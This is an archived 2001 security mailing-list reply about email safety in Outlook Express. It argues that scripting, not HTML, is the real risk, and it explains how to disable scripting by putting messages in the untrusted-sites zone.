After a bit of dinking in vi, I removed the HTML, AND got it properly indented for response, so... >Mark Slemko wrote: > >>>>2. Do not use a mail reader that forces you to display HTML messages. >Using something like Outlook Express is very dangerous, since it >means that you can be exploited if an email message arrives in your >inbox and is displayed. This is overkill. The problem is scripting, not HTML, which are really seperate issues. >If you do use something like Outlook >Express, be sure to configure it to disable scripting and make it >as restrictive as possible. The way to do this is to open the security tab, choose to run messages in the 'untrusted sites' zone, and then configure that zone to run no script at all. Russ Cooper has a nice write-up of all this at http://www.ntbugtraq.com/default.asp?sid=1&pid=47&aid=56 >Unfortunately, in the case of Outlook >Express, this doesn't appear to be enough since I can't find any >setting that will stop things like IFRAMEs from automatically >loading, which are enough to make you vulnerable in many situations. I don't know if this can be done, but disabling scripting for e-mail entirely should be enough. >Hopefully I'm missing something.<<< If I'm missing something, please let me know. >I wrote Microsoft a few days ago asking about shutting off HTML in >Outlook Express, and here's what they wrote back: To the best of my understanding of this very complex problem, HTML without script isn't going to get you. Script will get you, and you can turn that off. When I do use outlook, I've been running it with scripting turned off for quite some time and have noticed no loss of functionality, other than when David Litchfield sends me mail to test one of his latest findings, it doesn't work 8-) >The gentleman who responded to my query did so promptly, and from what I >gather from his wording (I am afraid that inbound functionality for >turning off html code is not possible in Internet Explorer as default.) I don't think you can, though you _can_ toggle between HTML, text, and rich text, which would have saved me a few moments getting the HTML out of _this_ message if I were using it now. >I would hazard that OE is inexorably tied to IE (ok, i'm not a >programmer, just hazarding a guess...) just like IE has deep hooks into >Windows itself, hence the inability to _disable_ reading html in basic >email. In fact I had limited my inquiry to turning HTML off in OE. It uses IE as an HTML viewer, as do many applications. However, if you'd have asked how to turn off scripting, they should have been able to answer, and I believe that's all you need to do to make your e-mail safe. IMHO, the worst problem is with using the browser, since too many sites use some form of scripting (like www.securityfocus.com), and you can't turn it completely off without losing the ability to do a lot of things. David LeBlanc dleblancat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:34:06 PDT